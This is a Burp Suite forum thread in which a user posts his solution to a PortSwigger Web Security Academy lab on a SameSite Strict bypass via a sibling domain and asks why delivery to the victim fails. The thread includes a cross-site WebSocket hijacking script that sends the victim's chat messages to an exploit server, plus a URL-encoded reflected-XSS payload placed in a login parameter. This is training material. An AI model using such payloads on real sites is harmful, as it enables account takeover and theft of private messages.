Burp Suite User Forum

Lab: SameSite Strict bypass via sibling domain - solution is broken

Jack | Last updated: Jul 12, 2024 11:01AM UTC

Hi, this is my solution and it works fine when clicking "view exploit" (I see my messages in the access log), but when I deliver it to the victim there is no incoming request. Can you please fix the lab? I was going crazy about what the issue could be, then I realized that if it works with "view exploit" but not when delivered, then the lab is broken. I also tried with fetch, with document.location.href etc.; all worked for me, but not when delivered.

GIF: https://postimg.cc/cgY3Mrv6

<script>
    let newWebSocket = new WebSocket("wss://0a1100c20450ae4880d662fe006900e9.web-security-academy.net/chat");

    newWebSocket.onopen = function (evt) {
        newWebSocket.send("READY");
    };

    newWebSocket.onmessage = function (evt) {
        var message = evt.data;

        fetch('https://exploit-0a6700500409aed5803a618f017d00eb.exploit-server.net/exploit?message=' + btoa(message), {
            method: 'GET',
            mode: 'no-cors',
        });
    };
</script>

<script>
    document.location("https://cms-0a1100c20450ae4880d662fe006900e9.web-security-academy.net/login?username=%3c%73%63%72%69%70%74%3e%0a%20%20%20%20%6c%65%74%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%22%77%73%73%3a%2f%2f%30%61%31%31%30%30%63%32%30%34%35%30%61%65%34%38%38%30%64%36%36%32%66%65%30%30%36%39%30%30%65%39%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%22%29%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%20%20%20%20%7d%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%76%61%72%20%6d%65%73%73%61%67%65%20%3d%20%65%76%74%2e%64%61%74%61%3b%0a%0a%20%20%20%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%36%37%30%30%35%30%30%34%30%39%61%65%64%35%38%30%33%61%36%31%38%66%30%31%37%64%30%30%65%62%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%65%73%73%61%67%65%3d%27%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%2c%20%7b%0a%20%20%20%20%20%20%20%20%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%0a%20%20%20%20%6d%6f%64%65%3a%20%27%6e%6f%2d%63%6f%72%73%27%2c%0a%20%20%20%20%20%20%20%20%7d%29%3b%0a%20%20%20%20%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e&password=ds");
</script>

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 09:43AM UTC

Hi Jack, Are you seeing any interactions in the access log when you deliver your exploit?

Jack | Last updated: Jul 15, 2024 06:34PM UTC

It got fixed somehow.
